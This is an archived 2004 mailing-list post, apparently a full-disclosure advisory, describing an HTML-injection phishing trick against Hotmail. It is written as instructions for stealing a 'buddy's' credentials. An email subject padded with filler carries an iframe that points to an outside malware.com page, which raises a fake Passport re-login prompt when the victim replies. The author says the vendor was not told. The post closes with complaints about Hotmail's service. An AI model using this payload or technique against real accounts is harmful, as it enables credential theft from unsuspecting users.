<<< Date Index >>>     <<< Thread Index >>>

HOTMAIL / PASSPORT: phishing expedition




Thursday, March 18, 2004

Unbelievably ridiculous insertion of arbitrary html into the 
Hotmail web based email account of your targeted "buddy".

In order to gain your "little pal's" credentials, simply send 
him or her an email with an extra long subject like so:

heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddy<iframe src="http://www.malware.com/pithy.html";>

Where our iframe points to window.open along with our trojanised 
passport re-sign in page. When your "chum" replies to your 
email, our iframe is rendered out of sight in the message body 
of the email and up goes our error window requesting him to 
login again. Only this time he'll be sending you his credentials.

Notes:

1. this is too pathetic for words. Cursory checking of all 
settings in hotmail 'reply to' suggests there is no de-
activation of html email when composing a reply.
2. consideration was given to informing the owner of this 
particular web based mail service of this particular issue 
however we have not used such a poor service in recent years. So 
much so one can only suspect that such a slovenly operation is 
intentional in order to force account users to upgrade to the 
pay service:

a) as of three hours from time of writing we are still awaiting 
receipt of emails into the hotmail account from eight [that's 
numeral 8] different mail servers. Internal mail messages are 
instant, but three hours for external is completely unacceptable.
b) constant 'server is busy' errors. What does 40 billion 
dollars buy you today. More acreage around your acreage for more 
privacy.
b) initiation and re-activation of a dormant account of the free 
webmail account from the owner of this particular web based mail 
service requires a magnifying glass to see. if you don't have 
one, you're liable to select the pay for service as it appears 
there are no other choices.
c) use yahoo mail. Instant receipt of emails from any mail 
server all the time. Reply to html email subject filters tags.

End Call

-- 
http://www.malware.com